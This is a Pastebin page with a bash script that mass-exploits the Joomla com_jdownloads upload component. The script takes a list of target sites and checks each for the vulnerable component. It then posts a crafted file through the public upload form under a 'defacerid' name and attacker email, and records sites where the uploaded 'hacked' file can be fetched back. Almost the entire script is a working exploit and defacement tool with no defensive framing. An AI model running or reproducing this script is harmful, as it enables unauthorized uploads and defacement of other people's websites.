Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- #coder
- UploadJD(){
- curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
- -H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
- -H "Accept-Language: en-us,en;q=0.5" \
- -H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
- -F "name=defacerid" \
- -F "mail=haxorid@gmail.com" \
- -F "catlist=1" \
- -F "file_upload=@doczxcvbnm.zip" \
- -F "filetitle=document" \
- -F "description=id" \
- -F "0537bf34386f2f179b57f09ed020e2c0=1" \
- -F "send=1" \
- -F "senden=Send file" \
- -F "description=defacerid" \
- -F "option=com_jdownloads" \
- -F "view=upload" \
- -F "pic_upload=@${namafile}" \
- --request POST "http://${1}/index.php?option=com_jdownloads&Itemid=0&view=upload"
- }
- CD(){
- curl --silent --max-time 10 --connect-timeout 10 "http://${1}/images/jdownloads/screenshots/${namafile}" -o tmp/cd.txt
- if [ ! -f tmp/cd.txt ];then
- echo "--> $urlnya : RTO"
- continue
- fi
- cat tmp/cd.txt | grep -i "hacked" > /dev/null;cd=$?
- if [ $cd -eq 0 ];then
- echo "--> ${1}/images/jdownloads/screenshots/${namafile} : exploit success"
- echo "http://${1}/images/jdownloads/screenshots/${namafile}" >> success.txt
- else
- echo "--> $urlnya : exploit failed"
- fi
- rm -f tmp/cd.txt
- }
- CV(){
- curl --silent --max-time 10 --connect-timeout 10 "http://${1}/components/com_jdownloads/jdownloads.js" -o tmp/cv.txt
- if [ ! -f tmp/cv.txt ];then
- echo "--> $urlnya : RTO"
- continue
- fi
- cat tmp/cv.txt | grep "document.uploadForm.file_upload.value\|com_jdownloads\|Toggles the check state of a group of boxes" > /dev/null;cv=$?
- if [ $cv -eq 1 ];then
- echo "--> $urlnya : not vuln"
- rm -f tmp/cv.txt
- continue
- else
- echo "--> $urlnya : found com_jdownloads"
- fi
- }
- Exp(){
- for url in `cat $list`
- do
- urlnya=$(echo $url | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1' | awk '{gsub("//","/")}1')
- if [ ! -f load.txt ];then
- touch load.txt
- fi
- cat load.txt | grep "$urlnya" > /dev/null;ccl=$?
- if [ $ccl -eq 1 ];then
- echo $urlnya >> load.txt
- else
- #udah pernah di load di file load.txt
- #kalau mau load ulang,silakan hapus file load.txt
- continue
- fi
- echo "--> $urlnya : check"
- CV $urlnya
- UploadJD $urlnya
- CD $urlnya
- done
- }
- Lengkap(){
- if [ ! -d tmp ];then
- mkdir tmp
- fi
- if [ ! -f $namefile ];then
- echo "[?] file $namafile gak ada"
- exit
- fi
- if [ ! -f $list ];then
- echo "[?] file $list gak ada"
- exit
- fi
- cat $namafile | grep -i "hacked" > /dev/null;chh=$?
- if [ $chh -eq 1 ];then
- echo "hacked" >> $namafile
- fi
- echo "zip" > doczxcvbnm.zip
- }
- read -p "[+] Enter name of gif = " namafile
- read -p "[+] Enter list target = " list
- Lengkap
- Exp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement